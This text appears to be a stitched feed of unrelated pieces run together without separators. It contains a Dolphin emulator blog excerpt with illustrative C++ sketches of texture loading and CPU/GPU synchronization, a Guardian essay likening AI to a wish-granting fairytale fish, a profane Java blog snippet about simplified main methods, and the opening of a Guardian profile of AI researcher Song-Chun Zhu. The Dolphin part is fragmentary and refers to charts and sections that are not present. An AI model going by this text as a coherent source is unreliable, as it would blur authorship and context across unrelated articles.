The biggest fundamental change to how custom textures were loaded came just two years ago, when we quietly added a new asset management system that allowed textures to load without blocking emulation. This change didn't amount to much on its own, except that instead of performance stuttering while textures loaded, any custom textures that weren't ready in time would pop in. Depending on your computer, you might not have noticed the change at all!
The resource manager is a further evolution of this change. It allows Dolphin to manage custom textures so that HD Texture Packs can work on a wider variety of hardware. The resource manager tracks the requests made each frame and orders them by recency: the newest requests get serviced first, leading to better perceived performance for loading textures. It also tracks memory usage and, if the machine is low on RAM, can purge the textures that have gone unused longest in order to prevent out-of-memory issues.
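In pseudocode terms, the scheme looks something like this - a minimal sketch with hypothetical names, not Dolphin's actual classes:

    #include <cstddef>
    #include <cstdint>
    #include <deque>
    #include <string>
    #include <unordered_map>

    struct TextureEntry { std::size_t bytes = 0; std::uint64_t last_used_frame = 0; };

    class ResourceManager {
        std::deque<std::string> m_requests;                      // pending loads
        std::unordered_map<std::string, TextureEntry> m_loaded;  // resident textures
        std::size_t m_used_bytes = 0;
        std::size_t m_budget_bytes;
    public:
        explicit ResourceManager(std::size_t budget) : m_budget_bytes(budget) {}

        // Newest request goes to the front of the line, so the textures the
        // game asked for most recently are serviced first.
        void Request(const std::string& name) { m_requests.push_front(name); }

        // When RAM runs low, purge the textures that have gone unused longest.
        void EnforceBudget() {
            while (m_used_bytes > m_budget_bytes && !m_loaded.empty()) {
                auto oldest = m_loaded.begin();
                for (auto it = m_loaded.begin(); it != m_loaded.end(); ++it)
                    if (it->second.last_used_frame < oldest->second.last_used_frame)
                        oldest = it;
                m_used_bytes -= oldest->second.bytes;
                m_loaded.erase(oldest);
            }
        }
    };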
One more bonus is that custom texture loading is now multithreaded. Texture loading no longer needs to borrow resources from Dolphin's main CPU emulation thread and can live on its own CPU core. This greatly improves the performance of loading many textures at once and reduces pop-in on modern multi-core CPUs. Combined with the other improvements the resource manager brings, HD Texture Packs should no longer cause performance issues in most cases.
One of the reasons that various Mario Kart Wii online services have a problem with Dolphin users isn't just how easy it makes cheating, but that even innocent users can cause havoc. While you may think that lagging during a race would be a disadvantage, due to the way Mario Kart Wii works, it can actually put you ahead. During the race, you'll be in a lower position, getting better items and avoiding blue shells. But when you finish, the game only uses your final time to calculate your finish position. If you lagged for three seconds over the course of the race and visually finished two seconds behind the leader, you will end up winning the race on the results screen. Yikes.
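The arithmetic is as dumb as it sounds. With made-up numbers:

    #include <cstdio>

    int main() {
        const double leader_time = 180.0;      // leader's race clock: 3:00.000
        const double visual_finish_gap = 2.0;  // lagged player crosses 2s later
        const double total_lag = 3.0;          // their emulated clock fell 3s behind

        // The lagged player's in-game timer counted 3 fewer seconds over the
        // same real-time race, so their recorded time is actually *lower*.
        const double lagged_time = leader_time + visual_finish_gap - total_lag;
        std::printf("leader: %.1fs, laggy player: %.1fs -> laggy player wins\n",
                    leader_time, lagged_time);
    }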
Modern Mario Kart Wii fan servers have protection against this, but it's still an annoying behavior, and it can definitely cause problems in other games that aren't big enough to get patches working around Dolphin's quirks.
For this situation and others like it, Billiard has introduced a new option that helps smooth over small lag spikes. Correct Time Drift allows Dolphin to speed up after a lag spike in order to keep emulation lined up with real-time progression.
If something causes emulation to slow down or stutter for a short period, Dolphin will use the next opportunity to speed up and catch back up to real time. For temporary issues like network packet drops during NetPlay, shader compilation, and JIT cache flushing, this feature can keep Dolphin locked to actual time. Outside of certain online games like Mario Kart Wii, this can also be useful for speedrunners to ensure that emulated time stays synchronized with real time, even through minor bobbles in emulation.
Note that some actions will cause Dolphin to abandon time correction. If you disable the speed limiter (holding TAB by default) at any point, Dolphin will not try to slow down for the duration that you are bypassing the speed limit and will choose a new "par time" once the limit is restored.
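Conceptually, the option works something like the following sketch - hypothetical names and a made-up catch-up factor, but the same idea of a rolling "par time":

    #include <chrono>

    class TimeDriftCorrector {
        using Clock = std::chrono::steady_clock;
        Clock::time_point m_par = Clock::now();  // when the next slice is "due"
    public:
        // Returns the speed factor for the next slice of emulation.
        double SpeedForNextSlice(std::chrono::milliseconds slice) {
            m_par += slice;
            // If real time is past our par time, we stalled - run fast until
            // emulated progress lines back up with the wall clock.
            return (Clock::now() > m_par) ? 1.25 : 1.0;
        }
        // Called when the speed limiter is re-enabled after being bypassed:
        // abandon the old par time instead of trying to "catch up" to it.
        void ResetPar() { m_par = Clock::now(); }
    };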
It has become established within the Dolphin project that Dual Core mode is a hack. It's well known that it is unstable, current developers have called it a hack, we've said it repeatedly here on the blog, and ector (one of Dolphin's founders) has said he regretted Dual Core. That really sounds like a hack! However, in the process of writing this article, we consulted retired Dolphin developers about Dual Core, and had an enlightening conversation.
They told us that Dual Core mode is not a hack. In fact, Dual Core mode is more like the original hardware than Single Core mode. And yet, Single Core mode is more accurate.
To explain this, we need to go into detail on what Dual Core mode and Single Core mode actually do.
The following are the processors on the GameCube, and how Dolphin emulates them. The Wii does have some differences, but most of them are minor outside of the addition of the Starlet processor. For simplicity, we will be focusing on the GameCube throughout this section.
Central Processing Unit - A single PowerPC CPU core. The emulated software lives within this core, and Dolphin, for the most part, isn't aware of what's going on in here. To Dolphin, everything the emulated CPU is doing is just instructions - a lot of instructions that go by very, very fast. Dolphin translates the instructions (via recompilation or interpretation) into something the host CPU can understand, but for the most part it doesn't know what they are doing.
NOTE: Dual Core mode does not split the emulated CPU onto two host CPU cores. We can't do that.
Graphics Processing Unit
Command Processor - A simple integrated circuit that sits between the CPU and the GPU. The CPU creates lists of commands for the GPU and throws them at the command processor, then carries on with its business. The command processor parses the command list and prepares the GPU to do the work, such as configuring the TEV unit and setting up registers. Dolphin emulates the command processor, and assuming a hardware graphics backend is being used, it converts the GameCube GPU commands into commands for the selected graphics API (Vulkan, OpenGL, etc.), then passes the work to the host's graphics driver.
TEV/XF/EFB/etc - Once the driver has commands, it converts those into the specific instructions and shaders that will run on the host GPU. This is still work for the host CPU, but it is done outside of Dolphin. The actual rendering, and thus most of the GPU emulation, happens on the host GPU (when using a hardware graphics backend).
Digital Signal Processor - A Macronix DSP that handles various audio processing duties. DSP-HLE is quite light since it emulates the results of the DSP rather than the processor itself. DSP-LLE actually emulates the processor, and it is quite heavy.
All of the processors above work asynchronously - each performs its work independently of the others. To coordinate and prevent race conditions, synchronization points must be used, communicating things like "VBlank just happened and we should start a new frame", or "there is work for you waiting in this memory region", or "the work I was assigned is now completed and I am waiting for more".
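In host terms, a synchronization point is nothing exotic - it's the same producer/consumer handoff any multithreaded program uses. A stripped-down illustration (not Dolphin's actual code):

    #include <condition_variable>
    #include <mutex>
    #include <queue>

    struct WorkItem { /* e.g. the address of a GPU command list */ };

    class Mailbox {
        std::mutex m_lock;
        std::condition_variable m_cv;
        std::queue<WorkItem> m_work;
    public:
        // Emulated CPU: "there is work for you waiting in this memory region".
        void Post(WorkItem item) {
            { std::lock_guard<std::mutex> guard(m_lock); m_work.push(item); }
            m_cv.notify_one();
        }
        // Emulated GPU: "the work I was assigned is completed, I am waiting".
        WorkItem WaitForWork() {
            std::unique_lock<std::mutex> guard(m_lock);
            m_cv.wait(guard, [this] { return !m_work.empty(); });
            WorkItem item = m_work.front();
            m_work.pop();
            return item;
        }
    };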
What is analogous to this in a modern PC? A multi-core processor. While cores may share some resources, they are more or less separate processors that operate asynchronously, and multithreaded applications need to synchronize across their threads. So of course, if a programmer wants to emulate a console with several processors running asynchronously, their very first thought would be to have a separate thread for each emulated processor. This makes the host hardware behave like the original hardware, plus those threads can spread out across the many CPU cores of the host, better utilizing the host hardware and easing the emulator's CPU requirements. Makes perfect sense!
That's Dual Core mode.﹡
Dual Core mode isn't a hack, because it closely mimics the original hardware!
The GameCube does not have an operating system. While it does have SDKs and various Nintendo-provided assistance, ultimately, games run on bare metal, and they have complete control over the system. They can do whatever they want. And the software controls synchronization.
A game following best practices will set a synchronization point wherever there is potential for a race and will not ignore the interrupts that the hardware sends back. If done correctly, the asynchronous processors cannot race at all. Games made by Nintendo's development teams, such as Super Mario Galaxy, are rock solid﹡ in Dual Core mode because they safely and thoroughly synchronize.
But game development is hard, and "best practices" are an early casualty of crunch. All too often, games run the hardware a little loose. For example, a common occurrence is that the game will have the CPU send work to the GPU before it has completely scheduled all of the GPU's resources. If the CPU can return and fill out the rest of those resources before the command processor and GPU are finished with the work they were already assigned, this won't cause any problems. And since each GameCube should behave more or less identically to any other GameCube, if it is fine on the developer's GameCube, it should be fine on any GameCube.
However, this is a race condition, and coding like this is asking for trouble.
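Here's a toy version of that pattern as two host threads. On console, the "GPU" is reliably still busy when the late write lands; on a PC, nothing guarantees it:

    #include <atomic>
    #include <thread>

    int resources[2];                      // data the GPU will consume
    std::atomic<bool> work_posted{false};

    void CpuThread() {
        resources[0] = 1;                  // schedule *some* of the resources
        work_posted.store(true);           // kick the GPU early...
        resources[1] = 2;                  // ...then finish filling them in. Racy!
    }

    void GpuThread() {
        while (!work_posted.load()) {}     // wait for the kick
        // If this thread runs "too fast", resources[1] may still be stale.
        const int a = resources[0], b = resources[1];
        (void)a; (void)b;
    }

    int main() {
        std::thread gpu(GpuThread), cpu(CpuThread);
        cpu.join();
        gpu.join();
    }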
In Dual Core mode, the emulated processors are spread across the host CPU cores, and Dolphin synchronizes at least as much as the original console. However, the time it takes for the host cores to do work could be literally anything. Modern CPUs adjust clockspeeds on a per-core basis and change their frequency all the time based on heuristics entirely outside of our control; the operating system will constantly move our threads around the host CPU and can decide to put one of them to sleep without warning; the CPU could be heterogeneous, and another program competing for resources could convince the OS to elevate one of its threads to the big cores and kick one of ours to the little cores; on and on and on. Race conditions are inherently unsafe on modern hardware!
Even Dolphin itself can unbalance the race. Normal emulation scenarios, like a big burst of shader compilation or the emulation threads stalling to save state or take a screenshot, are more than enough to change the victor of racing threads.
So if a game lets the chips race, the predictable and consistent race it was expecting on the original hardware becomes an unpredictable and inconsistent race in Dolphin. And if the race's outcome differs from the original hardware, the game and/or Dolphin may crash!
In Single Core mode, Dolphin does not spread the emulated processors across the host's processors. Instead, it gathers all of those processors and emulates them in a single host CPU thread. This gives Dolphin full control over synchronization, allowing it to force work to be consumed at the same granularity as the original hardware. The host hardware can no longer affect the emulated environment. Even if a game runs a little too loose, even if the host OS gets up in our business, even if syncing with another instance of Dolphin on the other side of the world, Single Core can handle it.
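A bare-bones sketch of the idea - hypothetical structure, not Dolphin's actual scheduler:

    #include <vector>

    struct EmulatedProcessor {
        virtual void RunCycles(int cycles) = 0;  // advance this chip's emulated time
        virtual ~EmulatedProcessor() = default;
    };

    // One host thread steps every emulated processor in fixed slices, so their
    // relative progress is identical on every run, on every machine.
    void SingleCoreLoop(std::vector<EmulatedProcessor*>& processors, const bool& running) {
        constexpr int kSliceCycles = 1000;  // granularity of the interleaving
        while (running) {
            for (auto* processor : processors)
                processor->RunCycles(kSliceCycles);
        }
    }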
This is not at all how the original hardware works, but the result is higher accuracy and stability. The only downside, of course, is performance.
This experience has reminded us that the developers who founded Dolphin really knew their stuff. Splitting the GameCube's processors across host CPU cores is inherently risky. The fact that Dual Core was stable enough to be Dolphin's default for over fifteen years is a testament to the capabilities of Dolphin's early developers. Dual Core mode is more or less as good as this implementation can get - as our repeated failures to improve it can attest.
And Dual Core mode was extremely influential. After Dolphin went open source, it could run some games at full speed. It was extremely buggy, it required top-tier hardware of the time, and it was not a lot of games, but Dolphin could be used for play. That possibility was given to us by Dual Core mode, as Single Core wouldn't reach playable speeds on high-end systems for another ten years or so. This was incredibly important in Dolphin's early days: the ability to play attracted users, which attracted more developers, which attracted more users, giving Dolphin the momentum to get off the ground after it went open source. Dolphin would not be where it is now without Dual Core mode.
That being said, times have changed. Our predecessors had to deal with Dual Core mode's instability to get playable performance, but, as we covered earlier, we don't have to. Dual Core is no longer necessary for most of our desktop users, and it should no longer be the default on desktop.
Then, what has changed now that we know all this? We will never call Dual Core mode a hack ever again.
That is what SyncGPU does. Specifically, in addition to all the synchronization points already in Dual Core, SyncGPU will only allow the processors to race a certain amount of emulated time before it forces a synchronization of its own.
In practice, SyncGPU was neither as fast as Dual Core nor as stable as Single Core, leaving it in a place where it simply didn't matter. But you already saw the charts.
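For the curious, the core of SyncGPU's idea can be sketched in a few lines - an illustrative drift window, not the real implementation:

    #include <atomic>
    #include <thread>

    std::atomic<long> g_cpu_cycles{0}, g_gpu_cycles{0};
    constexpr long kMaxDrift = 20000;  // emulated cycles the CPU may run ahead

    void CpuStep(long cycles) {
        // On top of Dual Core's normal sync points, stall the CPU thread
        // whenever it gets too far ahead of the GPU in emulated time.
        while (g_cpu_cycles.load() - g_gpu_cycles.load() > kMaxDrift)
            std::this_thread::yield();
        g_cpu_cycles.fetch_add(cycles);
    }

    void GpuStep(long cycles) { g_gpu_cycles.fetch_add(cycles); }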
To understand how AI will reconfigure humanity, try this German fairytale | Clemens J Setz
Guardian
www.theguardian.com
2025-09-16 07:00:00
Artificial intelligence will replace creativity with something closer to magical wishing. The challenge for future generations will be dealing with the feeling of emptiness that leaves us with In the German fairytale The Fisherman and His Wife, an old man one day catches a strange fish: a talking fl...
In the German fairytale The Fisherman and His Wife, an old man one day catches a strange fish: a talking flounder. It turns out that an enchanted prince is trapped inside this fish and that it can therefore grant any wish. The man’s wife, Ilsebill, is delighted and wishes for increasingly excessive things. She turns their miserable hut into a castle, but that is not enough; eventually she wants to become the pope and, finally, God. This enrages the elements; the sea turns dark and she is transformed back into her original impoverished state. The moral of the story: don’t wish for anything you’re not entitled to.
Several variations of this classic fairytale motif are known. Sometimes, the wishes are not so much excessive or offensive to the divine order of the world, but simply clumsy or contradictory, such as in Charles Perrault’s The Ridiculous Wishes. Or, as in WW Jacobs’ 1902 horror story The Monkey’s Paw, their wishes unintentionally harm someone who is actually much closer to them than the object of their desire.
Today, of course, most young people grow up with an enchanted fish in their pocket. They can wish for their homework to be done, and the fish will grant their wishes. They can wish to see any kind of sexual act imaginable, and (if they work around regional age-controls with a VPN) it will be visible. Soon they will be able to wish for films on a subject of their choice and these will be generated within seconds. They wish they had already finished that university essay – and lo and behold, it’s written.
This change in approach will not just upend our relationship as consumers of the creative arts, of written, musical or visual content, it will also reconfigure what it means to be creative and, therefore, what it means to be human. I can imagine that most people in the near future will be able to task an AI representative with all kinds of tiresome interactions – negotiating contracts on their behalf or acting as their agent, receiving and cushioning criticism, collating information, surveying opinions and so on. And the sea will never turn dark.
For now, young Ilsebills sitting in university lecture halls can still expect to be fined when their professor, who grew up in a different era, notices that she has got the enchanted fish to write yet another one of her essays. But that will only last a few more years, until Ilsebill is part of a self-confident majority and most of the professors grew up as Ilsebills themselves. Ilsebill wishes for a boyfriend, a spiritual coach, a therapist – and in an instant she will have one. With each one of these companions, it will feel as if Ilsebill has known them for years, which is literally true.
One could accuse Ilsebill of complicating matters when, like her mythical predecessor, she one day actually wants to become pope and immediately does so in her small world. But if anyone can easily become the pope, then the appeal of being the pope disappears for Generation Ilsebill. Because things only become interesting and desirable when they require a certain amount of resistance, or an obstacle, to be overcome. Ilsebill, however, only knows that type of attractive resistance from learning through prompting – through ever more precise wishing.
Today, young people grow up with an enchanted fish in their pocket … The Fisherman and His Wife. Illustration: Alamy
She devotes most of her energy in life to fine-tuning the tone of her results. She won’t have acquired her own ear for the tone of a piece of writing, but from gauging the way other people or AIs react to a text that she sent she will know whether the content is appropriate or inappropriate. That way, she learns to make ever more credible wishes. In the past, Ilsebill rarely met people who found things that she said interesting or remarkable. But today everything she discusses with her AI is deemed interesting and remarkable. Finally someone is properly listening, in the way no human partner could do so unconditionally.
And what if the point is reached where all the wish fulfilment leaves Ilsebill feeling empty? What paths are still open to her then?
The first is the path to decadence. We know this mechanism from studying very rich people. In the future, those who have enough money will be able to still afford human therapists or visit the cinema to see films made with real humans. Recently, someone on an AI forum suggested that in the future we should simply have some AI produce masses of child sexual abuse images, so that at least no real children would be harmed in their production. This suggestion was instantly ridiculed, because consumers of child abuse images are not buying just any visual stimulus, but primarily the certainty that real children were tortured. They insist on the credible provenance of the product, its “aura”, so to speak. If Ilsebill has enough capital, she will in a way be like them.
The second path is that of small breakaway communities that artificially create difficulties and obstacles for each other, perhaps in the style of old-fashioned sports or hunting clubs, perhaps also in a sect-like manner. They meet in secret or exclusively for an underground event in some basement, which will require them to queue. There’s no goal other than the agonising act of queueing itself. I got this idea from Stanislaw Lem’s novel The Futurological Congress. Today, in 2025, queuing is still free. Later generations might well marvel at this.
The third path is the most likely and the most obvious. Within her fairytale world of wish fulfilment, Ilsebill will discover an overarching principle that colours all her wishes anew, re-weights them, and gives them meaning: guilt. It is well known that guilt is the strongest means of binding a person to a product. A product that one loves but is ashamed to use grows powerfully in the mind and strongly attaches itself to a personality, enveloped in neuroses and real-life substitute virtues to compensate for the ever-increasing guilt.
Ilsebill naturally takes on the enormous ecological guilt of the enormous waste of resources caused by AI. The main guilt is transferred from the giant corporations, the all-pervasive companies, or even the interaction of several states, straight on to Ilsebill, and she now does the logical thing of restricting and punishing herself more and more in the way she goes about her everyday life. Every morning she wakes up with the certainty that every small decision, every smallest wish, will massively damage “the planet”, “the society” or “the future”. She blossoms in her new-found role as saviour, in this system of martyr-like vicarious guilt. This role feels, not without justification, like a battle that will be fought within her for all eternity. It is the magic ingredient that can restore to her life the long-missing flavour of self-sacrifice and inner contradiction. Ilsebill doesn’t protest against the absurd waste of resources, but rather curtails all her freedoms in her private life, such as her supply of adequate nutrients, her water consumption, the number of children she has and her range of movement. In the end she dies, as a kind of Christ of corporations, and takes all her sins to her grave.
The reason why so many European fairytales warned against unwise, ignorant wishes was because like most large, collectively produced complex narratives, their basic theme is individuals coming of age. How does a person grow up, how do they find their place in life, what should they pass on to the next generation, all these questions. Ilsebill, however, at least in this last scenario, no longer has the freedom to answer any of these questions by herself. It will all be decided for her.
As of September 16th, year of our lord 2025, this is no longer the first Java program you need to write.
    import java.util.Scanner;

    public class Main {
        public static void main(String[] args) {
            Scanner scanner = new Scanner(System.in);
            System.out.print("What is your name? ");
            String name = scanner.nextLine();
            System.out.println("Hello, " + name);
        }
    }
This is.
    void main() {
        var name = IO.readln("What is your name? ");
        IO.println("Hello, " + name);
    }
Good Fucking Riddance.
I'll be nuanced later, we've all earned some catharsis now.
Holy fucking shit did this suck¹. There is a comments section below. Give your eulogy for that piece of shit sorcerous incantation there or wherever else.
new Scanner(System.in) and System.out.println too. Don't let your sense of dignity hold you back. Just record yourself giving a guttural scream and post it. Sing a song, do a dance, cast aspersions.
‘I have to do it’: Why one of the world’s most brilliant AI scientists left the US for China
Guardian
www.theguardian.com
2025-09-16 05:00:27
In 2020, after spending half his life in the US, Song-Chun Zhu took a one-way ticket to China. Now he might hold the key to who wins the global AI race By the time Song-Chun Zhu was six years old, he had encountered death more times than he could count. Or so it felt. This was the early 1970s, the w...
Song-chun Zhu at Peking University, July 2025. Photograph: Sean Gallagher/The Guardian
By the time Song-Chun Zhu was six years old, he had encountered death more times than he could count. Or so it felt. This was the early 1970s, the waning years of the Cultural Revolution, and his father ran a village supply store in rural China. There was little to do beyond till the fields and study Mao Zedong at home, and so the shop became a refuge where people could rest, recharge and share tales. Zhu grew up in that shop, absorbing a lifetime’s worth of tragedies: a family friend lost in a car crash, a relative taken by an untreated illness, stories of suicide or starvation. “That was really tough,” Zhu recalled recently. “People were so poor.”
The young Zhu became obsessed with what people left behind after they died. One day, he came across a book that contained his family genealogy. When he asked the bookkeeper why it included his ancestors’ dates of birth and death but nothing about their lives, the man told him matter of factly that they were peasants, so there was nothing worth recording. The answer terrified Zhu. He resolved that his fate would be different.
Today, at 56, Zhu is one of the world’s leading authorities in artificial intelligence. In 1992, he left China for the US to pursue a PhD in computer science at Harvard. Later, at University of California, Los Angeles (UCLA), he led one of the most prolific AI research centres in the world, won numerous major awards, and attracted prestigious research grants from the Pentagon and the National Science Foundation. He was celebrated for his pioneering research into how machines can spot patterns in data, which helped lay the groundwork for modern AI systems such as ChatGPT and DeepSeek. He and his wife, and their two US-born daughters, lived in a hilltop home on Los Angeles’s Mulholland Drive. He thought he would never leave.
But in August 2020, after 28 years in the US, Zhu astonished his colleagues and friends by suddenly moving back to China, where he took up professorships at two top Beijing universities and a directorship in a state-sponsored AI institute. The Chinese media feted him as a patriot assisting “the motherland” in its race toward artificial intelligence. US lawmakers would later demand to know how funders such as UCLA and the Pentagon had ignored “concerning signs” of Zhu’s ties to a geopolitical rival. In 2023, Zhu became a member of China’s top political advisory body, where he proposed that China should treat AI with the same strategic urgency as a nuclear weapons programme.
Zhu’s journey from rural China to the helm of one of the US’s leading AI labs was both improbable and part of a much bigger story. For almost a century, the world’s brightest scientific minds were drawn to the US as the place where they could best advance their research. The work of these new arrivals had helped secure US dominance in technologies such as nuclear weapons, semiconductors and AI. Today, that era seems to be coming to a close. Donald Trump is dismantling the very aspects of US society that once made it so appealing for international talents. He has shut off research funding and attempted to bully top universities, which his administration views as hostile institutions. As US-China tensions have grown, Chinese-born students and professors in the US have faced additional pressures. In a callback to the “red scare” of the 1950s, Chinese students and professors have been detained and deported, and had their visas revoked.
Even as the Trump administration lays siege to the foundations of US science, it has been trumpeting its plans to beat its Chinese rival in the field of AI. In July, Trump announced the creation of a $90bn “AI hub” in Pennsylvania, as well as a national blueprint – created in close coordination with Silicon Valley tech leaders – to dominate every aspect of AI globally, from infrastructure to governance. “America is the country that started the AI race,” Trump said. “I’m here today to declare that America is going to win it.” A month later, China unveiled its own blueprint, vowing to fuse AI with the marrow of its economy, from factory automation to elder care.
At his lavishly funded Beijing Institute for General Artificial Intelligence, Zhu is one of a handful of individuals who the Chinese government has entrusted to push the AI frontier. His ideas are now shaping undergraduate curriculums and informing policymakers. But his philosophy is strikingly different from the prevailing paradigm in the US. American companies such as OpenAI, Meta and Anthropic have collectively invested billions of dollars on the premise that, equipped with enough data and computing power, models built from neural networks – mathematical systems loosely based on neurons in the brain – could lead humanity to the holy grail of artificial general intelligence (AGI). Broadly speaking, AGI refers to a system that can perform not just narrow tasks, but any task, at a level comparable or superior to the smartest humans. Some people in tech also see AGI as a turning point, when machines become capable of runaway self-improvement. They believe large language models, powered by neural networks, may be five to 10 years away from “takeoff”.
Zhu insists that these ideas are built on sand. A sign of true intelligence, he argues, is the ability to reason towards a goal with minimal inputs – what he calls a “small data, big task” approach, compared with the “big data, small task” approach employed by large language models like ChatGPT. AGI, Zhu’s team has recently said, is characterised by qualities such as resourcefulness in novel situations, social and physical intuition, and an understanding of cause and effect. Large language models, Zhu believes, will never achieve this. Some AI experts in the US have similarly questioned the prevailing orthodoxy in Silicon Valley, and their views have grown louder this year as AI progress has slowed and new releases, like GPT-5, have disappointed. A different path is needed, and that is what Zhu is working on in Beijing.
It is hard, in the current AI race, to separate out purely intellectual inquiry from questions of geopolitics. Where researchers choose to carry out their work has become a high-stakes matter. Yet for some scientists, the thrill of intellectual inquiry – as well as the prospect of personal glory – may remain more compelling than the pursuit of national advantage. Mark Nitzberg, Zhu’s friend of 20 years and a fellow classmate back in their Harvard days, was surprised by Zhu’s abrupt return to China. “I asked him: ‘Are you sure you want to do this?’” Nitzberg told me. Returning, he told Zhu, could make him a “vector” to help China dominate AI. In Nitzberg’s recollection, Zhu replied: “They are giving me resources that I could never get in the United States. If I want to make this system that I have in my mind, then this is a once in a lifetime opportunity. I have to do it.”
Nearly everyone who knows Zhu in the west asked me the same question: have you been to his office? Tucked behind Weiming Lake on the north side of Peking University campus, it almost seems built to dazzle visitors. A latticed wooden gate marks the entrance, after which you are led into a courtyard residence that Zhu uses for lectures and seminars. There, his assistants gesture you to the end of the hall, where a back door opens on to a breathtaking landscape of rocks, streams and pomegranate trees. Another courtyard residence can be spotted across the stream, on its own island, accessible via a stone footbridge. That is Zhu’s “office”.
One spring morning when I visited, Zhu was admiring his flora, while grumbling that his stream had been muddied by a rain shower the day before. I asked him who was maintaining the grounds. “We’ve got an entire team,” he said, gesturing to a group of men who had just entered the courtyard. Across from Zhu’s office, on the other side of the stream, is a glass-encased meeting room where he holds court with visitors. We sat there as Zhu began recounting a life spent straddling two superpowers.
Born in 1969, near Ezhou, an ancient river port along the Yangtze, Zhu was the youngest of five children. When he was very young, a wave of intellectuals arrived in his village to be “reeducated”, as part of Mao’s nationwide campaign to remould “bourgeois thought” through hard labour. At night, under candlelight and paraffin lamps, teachers, priests and college graduates held salons near the supply store where Zhu’s father worked. Zhu listened as they debated everything from the Soviet Union’s growing involvement in Afghanistan to the US elections. “By the time I entered elementary school, I felt like I had a good grasp of what was happening in China and the world,” Zhu told me. He knew he did not want to stay in his home town and work in his father’s shop.
After Mao died in 1976, reformers took over the Communist party and soon scientific education replaced Marx as the new religion. Zhu was the top student at his local high school, and won a place at one of the nation’s best universities, the University of Science and Technology of China (USTC) in the city of Hefei, where he majored in computer science. By 1986, when Zhu began his degree, relations between the US and China had normalised and some of his professors were among the first batch of Chinese scholars sent on state-sponsored visits to the US. They brought back hauls of books to be translated. “At the time, we saw America as a beacon, a cathedral of science,” Zhu said.
Among the imported books was Vision by David Marr, a British neuroscientist who had famously broken down human vision – a biological process – into a mathematical framework. Marr’s work suggested that machines might one day be able to “see” the world as humans do. Zhu was hooked. Ever since then, he has dreamed of mapping intelligence – how we think, reason and exercise moral judgment – with the mathematical precision of a physicist charting the cosmos. Building an AGI was, for him, not an end goal, but a part of his deeper pursuit: to discover a “theory of everything” for the mind.
Zhu is known to have cried twice in public over recent years. The first was when recounting to his students the story of his acceptance to Harvard. In 1991, when Zhu graduated from USTC, he was so poor he couldn’t afford the application fees required by American universities. He applied anyway, without paying the fees, though not to the country’s most elite schools – he didn’t dare. In any case, he was summarily rejected. The following year, one of his professors suggested that Zhu apply again, and that Ivy League schools, which had more money, might not care about the missing application fee. A few months later, he was astonished to receive a thick yellow envelope from Harvard, offering him a full fellowship in the university’s doctoral programme in computer science. “It changed my life,” Zhu said.
Song-Chun Zhu in the gardens outside his office at Peking University, 10 July 2025. Photograph: Sean Gallagher/The Guardian
The man responsible was David Mumford, a decorated mathematician and Fields medalist who, a few years prior, had begun working on computer vision, a field of AI focused on enabling machines to recognise and process visual information. When Mumford came across an applicant from central China who espoused a “theory of everything” for intelligence, and cited Marr as his muse, he was captivated. “I was just flabbergasted at his vision and how he was going about approaching AI in this comprehensive way,” Mumford told me. In a 2020 interview, Mumford, who became Zhu’s adviser, mentioned the moment he realised he “was dealing with something special”. Zhu had taken an hour-long exam, but left one question blank. Not because it was hard, but because it was too easy. “He said, ‘This is ridiculous,’” recalled Mumford, “but he answered everything else perfectly.”
During our conversations over the course of this spring, Zhu seemed to associate Harvard with the US he had dreamed of in his youth: an open laboratory where a country bumpkin from rural China could, with enough gumption, make technological miracles into reality. This was the US of Edison and Einstein, the land that welcomed Jewish physicists fleeing Hitler’s Germany and gave them refuge, dignity and labs at Los Alamos. In Zhu’s eyes, it was a country that rewarded intellect and ambition over race, ideology and nationality. At Harvard, he never felt out of place, though occasionally he was puzzled by his new home. On one occasion he asked his classmate Nitzberg why no one picked the apples from the trees around Harvard campus. He thought it was a waste of food.
It wasn’t until 1997 that Zhu experienced a real culture shock in the US. After completing his doctorate at Harvard and a brief stint at Brown University, he arrived at Stanford to work as a lecturer. He was accompanied by his wife, Jenny, a former classmate at USTC, whom he had married in 1994. At the time, the Bay was bursting with dot-com excitement. Yahoo had recently gone public on Wall Street and venture capitalists were hovering around campus. Two PhD students in Zhu’s department, Larry Page and Sergey Brin, had just created a search engine called google.com. As students flocked to courses on web development, Zhu’s more theoretical classes on pattern recognition struggled to attract much interest. It was a disheartening moment for him. “At Harvard, it was all about understanding. Their logo was three books,” he told me. But Stanford’s logo – an “S” behind a tree – looked “like a dollar sign”.
Zhu spent a year at Stanford before moving on to Ohio State University, whose culture he found unambitious and parochial, and then in 2002 to UCLA, where he obtained tenure at the age of 33. That same year, Jenny gave birth to their second daughter, Zhu Yi, and a year later he received the Marr Prize, the top award in computer vision. Colleagues likened him to Steve Jobs for his intensity and intolerance of mediocrity. When I asked one of his collaborators at UCLA about what it was like to work with Zhu, he said: “It’s as if I’m on the frontlines of a battlefield. We don’t sit down with a cup of coffee and talk about life or our families. That never happens. It’s always just about work and research.”
During Zhu’s 18 years at UCLA, his field went through almost unimaginable changes. For roughly the first half of this period, he was a leading figure in the AI mainstream. Yet in the second half, he became increasingly disillusioned. Speak to different people and they will propose different theories as to why Zhu ultimately decided to leave the US, but there is little doubt that he was influenced, at least in part, by his intellectual estrangement from the field he had once helped shape.
Zhu’s relationship to the so-called “godfathers of AI” – figures such as Geoffrey Hinton, Yoshua Bengio and Yann LeCun – is, to put it mildly, complicated. There was a time, however, when they were all roughly on the same page. Drawn to the common goal of making intelligent machines, they saw visual perception as a key problem to crack. Until the late 1980s and 90s, the most popular way to make computers “see” was through hand-coded instructions. To identify a handwritten digit, for example, a researcher wrote detailed instructions to a computer, accounting for each scenario where the lines and strokes matched that digit. This rule-based approach was brittle – slight variations in handwriting could break the logic.
Then came a series of breakthroughs. In the late 1980s, LeCun, then a researcher at AT&T Bell Labs, developed a powerful neural network that learned to recognise handwritten zip codes by training on thousands of examples. A parallel development soon unfolded at Harvard and Brown. In 1995, Zhu and a team of researchers there started developing probability-based methods that could learn to recognise patterns and textures – cheetah spots, grass etc – and even generate new examples of that pattern. These were not neural networks: members of the “Harvard-Brown school”, as Zhu called his team, cast vision as a problem of statistics and relied on methods such as “Bayesian inference” and “Markov random fields”. The two schools spoke different mathematical languages and had philosophical disagreements. But they shared an underlying logic – that data, rather than hand-coded instructions, could supply the infrastructure for machines to grasp the world and reproduce its patterns – that exists in today’s AI systems such as ChatGPT.
